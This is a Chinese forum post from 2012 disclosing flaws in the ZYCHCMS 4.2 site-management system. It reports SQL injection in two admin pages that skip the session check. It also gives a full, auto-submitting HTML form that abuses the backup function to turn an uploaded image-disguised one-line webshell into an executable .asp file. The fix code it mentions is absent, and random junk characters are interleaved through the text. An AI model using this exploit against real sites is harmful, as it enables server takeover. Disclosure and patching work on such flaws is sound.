% k6 b8 F3 e4 |
' K( l* V Y+ _0 O1 l/ n# |. T4 S
1 t1 s4 V: l' N! K6 x" I影响版本:ZYCHCMS企业网站管理系统4.2(存在以下两个文件的版本应该是通杀)
% a: {* O! C3 _* E) C ①SQL注射漏洞
5 @% g6 w. ~7 G8 U) Y# n 漏洞文件:/admin/add_js.asp & /admin/add_xm_jiang.asp; Q( t0 t7 U5 T2 I. ^
漏洞原因:未过滤( z$ K( y$ O" N) E- L
漏洞代码:
c9 e0 l/ \2 W: J3 Q 都是相同的,文件开头没有调用过滤文件/admin/seeion.asp,导致没有对当前权限进行判断,就直接操作数据库。
+ a( S+ _, D! m+ o0 T$ b; c- [' s 修复方法:在文件开头加入代码3 a2 p: t# ]3 _% |' t: o
& Y+ j" r: c" ~' v4 r$ h- p
" I1 l) v0 {6 ?4 E7 m% W- {8 o
②后台拿WBSHELL- A- i# V6 M- U* P& G) K2 _$ Q h1 m
进入后台有一个数据库备份,可以通过本地提交突破创建.asp后缀文件夹,并将一句话备份进去。0 H8 b e* _. k) P. R* E
这里在网上找了一个,改了下,将就着用。) {9 A" a0 R# f% x7 G0 q
以下是代码本地提交代码
8 B5 R- i& g/ [5 Z m 4 o/ Y4 B# b: D9 w
1 q/ ?+ R$ d; c" `
<form method=”post” action=”http://localhost/admin/Manage_backup.asp?action=Backup” name=add>
/ j0 o$ P2 a0 |/ q6 j) {! C <!–eg:http://127.0.0.1:99/admin/Manage_backup.asp?action=Backup–>" U" W) j/ U4 d) d+ B! n$ v3 j7 {
<tr>
6 D8 m8 I( t5 i; K2 _+ P <td height=”30″ background=”images/bg_list.gif”><div style=”padding-left:10px; font-weight:bold; color:#FFFFFF; text-align:left”>备份数据库</div></td>; Y; T! n) W7 @
</tr>3 @4 _" v* }9 w# s4 T0 X1 K3 X3 c
<tr>
! C7 L, B+ C5 k! e <td bgcolor=”#FFFFFF”><span class=”back_southidc”>! `( i0 r; o7 Z! J
</span>
1 J' i9 f1 S4 {7 M/ z <table width=”100%” border=”0″ align=”center” cellpadding=”5″ cellspacing=”0″ >% n6 K* t% F4 v
<tr onmouseover=”style.backgroundColor=’#EEEEEE’” onmouseout=”style.backgroundColor=’#F1F5F8′” bgcolor=”#F1F5F8″ >
& C% G! j$ |; ]7 J* T6 V <td height=”25″ width=”30%” class=”td”><div align=”left”>当前数据库路径</div></td>
' T6 b4 X2 h& m% V <td width=”70%” class=”td”>90sec. K5 L9 v8 S8 d
/ A7 F; h% L+ j- _ V/ f* _ <div align=”left”>, b- V$ m( h$ B) r: D8 N
<input type=”text” size=”30″ name=”DBpath” value=”此处为你在其网站上传的图片格式一句话路径” />
, b' u; j$ I* U; S <!–eg:../uploadfile/image/Logo/20120803130885328532_ZYCH.jpg>
7 o/ ~0 C" P' U7 D) _. d <input type=”hidden” size=”50″ name=”bkfolder” value=”123.asp” />& u' F7 y: I. |
</div></td># Y; D) `9 ? ] u( l
</tr>
( x0 z! n/ f" O. f4 w6 j+ @ <tr onmouseover=”style.backgroundColor=’#EEEEEE’” onmouseout=”style.backgroundColor=’#FFFFFF’” bgcolor=”#FFFFFF”>. v- i, V% m7 x% u# o
<td height=”25″ width=”30%” class=”td”><div align=”left”>备份数据库名称</div></td>
6 \! F3 d6 T5 c* b9 c <td class=”td”><div align=”left”>
8 b5 A. L. e6 D/ @ <input type=”text” size=”30″ name=”bkDBname” value=”4.mdb” />
1 f" L3 x# c: T! e2 u% s: i, } [如备份目录有该文件,将覆盖,如沒有,将自动创建]</div></td>
- Q* q7 G y" x0 J. w# a8 ` </tr>$ O: a# y, t: l5 F3 W6 R
<tr onmouseover=”style.backgroundColor=’#EEEEEE’” onmouseout=”style.backgroundColor=’#F1F5F8′” bgcolor=”#F1F5F8″>
/ @* ~4 R4 `/ G, Y0 `" ]. i5 f <td height=”25″ width=”30%” class=”td”><div align=”left”></div></td>
4 `4 M4 B, J8 n! ^ <td class=”td”><div align=”left”>
4 p" R4 j; L7 q2 M* K <input type=”submit” value=”确定备份” class=”btn”7 G# o! \9 W7 t. x+ C8 y
</div></td>
8 O; R% H" H) u; D5 \7 x </tr># i" P* x" k" G0 m' j ]
</table></td></tr></form>
& ~& g. {- _4 C) e; J6 T+ X9 X </table>
% V, ?! V) y$ j+ w9 V </td>
7 A/ c( G2 g- R) T </tr>5 K3 p0 @* J7 G1 I8 |" g
</table># H3 u0 U3 a2 I" ?0 D
<script>4 |1 U0 o$ d" r: s
document.all.add.submit();
0 Q* I+ J3 Y+ K( b. ?. Z; t6 K8 Z5 q </script>
% \1 ~ h/ q: z9 t9 f6 [. a0 E& H
0 c; q3 ]8 a/ h. S! O4 W! s; }; Q, b- |# Q f6 L
9 X0 ^: Y$ F3 J/ M. N8 x
1 d* @. _! s0 G. I! ^. N
$ b3 [$ R' s$ f3 E/ u8 V5 s8 ~& X1 w
. _! u9 ] ^$ j$ Y& l) a% c+ x
- `" d( @" l, U/ w6 y! N
+ j" @$ x) {8 u8 A4 [: d& t3 {6 C J7 V% a, l7 d0 V' Q4 t& F S/ x
|
发表于 2012-9-10 21:09:51
收藏
支持
反对